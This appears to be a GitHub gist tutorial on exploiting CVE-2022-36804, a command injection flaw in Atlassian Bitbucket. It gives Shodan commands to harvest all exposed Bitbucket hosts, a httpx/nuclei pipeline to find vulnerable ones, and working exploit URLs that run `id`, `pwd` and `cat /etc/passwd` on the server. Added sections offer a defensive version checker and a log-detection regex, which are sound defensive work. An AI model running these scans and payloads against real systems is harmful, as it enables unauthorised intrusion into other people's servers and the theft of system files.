@simrotion13
Last active September 22, 2022 17:14
Hi guys,
Today we explore the Atlassian Bitbucket command injection vulnerability (CVE-2022-36804).
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center from version 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, from version 8.2.0 before version 8.2.2, and from version 8.3.0 before version 8.3.1 allow remote attackers with read permission to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. Note that read access to a public repository is enough, so an instance that exposes any public project is reachable without credentials.
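The affected ranges in the description above are easy to misread by eye, so here is a small version check, added for this page and not part of the gist. The ranges are copied from the description; the helper names (to_num, in_range, bitbucket_affected) and the script name in the usage comment are hypothetical.

```shell
#!/bin/sh
# Added example (not part of the gist): decide whether a Bitbucket Server /
# Data Center version string falls inside one of the affected ranges listed
# in the CVE-2022-36804 description. The ranges are copied from that text;
# everything else here is a hypothetical helper written for this page.

# Turn "MAJOR.MINOR.PATCH" into one integer so ranges compare numerically
# (7.6.17 -> 7006017). A missing component counts as 0.
to_num() {
    echo "$1" | awk -F. '{ printf "%d", $1 * 1000000 + $2 * 1000 + $3 }'
}

# in_range VERSION LOW HIGH: true when LOW <= VERSION < HIGH, i.e. VERSION is
# at or above the first affected release and below the first fixed one.
in_range() {
    v=$(to_num "$1"); lo=$(to_num "$2"); hi=$(to_num "$3")
    [ "$v" -ge "$lo" ] && [ "$v" -lt "$hi" ]
}

# bitbucket_affected VERSION: prints "affected" or "not-affected" and returns
# 0 / 1 accordingly, so it works both in pipelines and in an if-statement.
bitbucket_affected() {
    ver=$1
    # "first affected  first fixed" pairs, exactly as in the advisory text.
    for range in "7.0.0 7.6.17" "7.7.0 7.17.10" "7.18.0 7.21.4" \
                 "8.0.0 8.0.3"  "8.1.0 8.1.3"   "8.2.0 8.2.2" "8.3.0 8.3.1"; do
        set -- $range                      # $1 = low bound, $2 = fixed version
        if in_range "$ver" "$1" "$2"; then
            echo affected
            return 0
        fi
    done
    echo not-affected
    return 1
}

# Usage: ./bitbucket-check.sh 7.21.3   (prints "affected")
if [ -n "${1:-}" ]; then
    bitbucket_affected "$1"
fi
```

Bitbucket reports its version in the application-properties REST resource (GET /rest/api/latest/application-properties), so the version string to feed this check can be read from a target without the exploit request. Versions below 7.0.0 are not in any listed range and come out as not-affected here, which only means the advisory does not list them, not that they are safe.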
Shodan Dork : 'http.component:"BitBucket"'
Run the commands below to download the results (a Shodan API key with query credits is needed):
shodan download bitbucket 'http.component:"BitBucket"' <--- This downloads the first 1000 results (the default limit)
shodan download --limit -1 bitbucket 'http.component:"BitBucket"' <-- This downloads the entire result set
Now we separate the IP:PORT pairs from the Shodan results. For this we use the shodan parse command together with awk (tee -a appends, so delete or deduplicate bitbucketip.txt before re-running):
shodan parse bitbucket.json.gz --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a bitbucketip.txt
We will be using the nuclei vulnerability scanner to automate the check. httpx first probes each IP:PORT and prints only the URLs that actually answer HTTP(S); nuclei then runs the CVE-2022-36804 template against them:
cat bitbucketip.txt | httpx -silent | nuclei -t CVE-2022-36804.yaml | tee nuclei.txt
Check nuclei.txt for the vulnerable URLs.
Thanks for watching !!
------------------------------
Sample Endpoint URLs
/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin
/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60cat%20%2fetc%2fpasswd%60%00--remote=origin
/rest/api/latest/{projectpath}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60pwd%60%00--remote=origin
Here {projectpath} is the project and repository path of a repository the requester can read. The injection sits in the prefix parameter: the URL-encoded NUL bytes (%00) split the value into separate arguments for the git archive command the endpoint runs, so "ax" becomes the harmless prefix and --exec=`id` and --remote=origin are appended as real git archive options (--exec is the option git archive uses to pick the upload-archive program on the remote side). Because git runs that --exec value through the shell, the backtick-wrapped command executes on the Bitbucket server. The filename, at and path parameters only need to be present; their values do not matter.
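For the defensive side, here is a detection check for the payload shape shown above, added for this page and not part of the gist. It runs over constructed access-log lines in common log format; the project key PROJ, the repository slug repo, the client addresses and the status codes are all made up, and the regex assumes a CLF-style line (adapt it to your reverse proxy's or Bitbucket's own access-log format).

```shell
#!/bin/sh
# Added example (not part of the gist): flag requests to the REST archive
# endpoint whose prefix= value carries an encoded NUL (%00). That byte is what
# splits the injected --exec / --remote options off the legitimate prefix
# argument, so its presence in prefix= is the signal worth alerting on,
# whatever command is wrapped in the backticks. All sample data is constructed.

# ERE: archive endpoint under /rest/api/, then a prefix= query value that
# contains %00 before the next '&', a space, or the closing quote of the
# request target. The '?' is bracketed so it is matched literally.
INJECTION_RE='/rest/api/[^ "]*/archive[?][^ "]*prefix=[^& "]*%00'

# Print every matching log line (stdin -> stdout).
find_archive_injection() {
    grep -E "$INJECTION_RE"
}

# Print the number of matching log lines (grep -c exits 1 when it is zero).
count_archive_injection() {
    grep -Ec "$INJECTION_RE"
}

# Constructed sample: two injection attempts (first and last lines), one
# legitimate archive download with a normal prefix, and one unrelated page.
SAMPLE_LOGS='10.0.0.5 - - [20/Sep/2022:10:01:02 +0000] "GET /rest/api/latest/projects/PROJ/repos/repo/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin HTTP/1.1" 500 83
10.0.0.7 - - [20/Sep/2022:10:01:05 +0000] "GET /rest/api/latest/projects/PROJ/repos/repo/archive?filename=src.zip&at=refs%2Fheads%2Fmain&format=zip&prefix=src/ HTTP/1.1" 200 9031
10.0.0.9 - - [20/Sep/2022:10:02:11 +0000] "GET /projects/PROJ/repos/repo/browse HTTP/1.1" 200 1440
10.0.0.5 - - [20/Sep/2022:10:02:30 +0000] "GET /rest/api/1.0/projects/PROJ/repos/repo/archive?filename=a&at=a&path=a&prefix=ax%00--exec=%60cat%20%2fetc%2fpasswd%60%00--remote=origin HTTP/1.1" 500 83'

# Usage: list the suspicious requests in the sample (or pipe a real log in).
printf '%s\n' "$SAMPLE_LOGS" | find_archive_injection
```

The check keys on %00 inside prefix= rather than on the literal string "--exec", because the option name is trivially re-encoded (%2d%2dexec) while the NUL is what the injection needs to split arguments. A legitimate archive download with prefix=src/ passes through untouched, and the matched lines give you the source address and the repository path to pivot on.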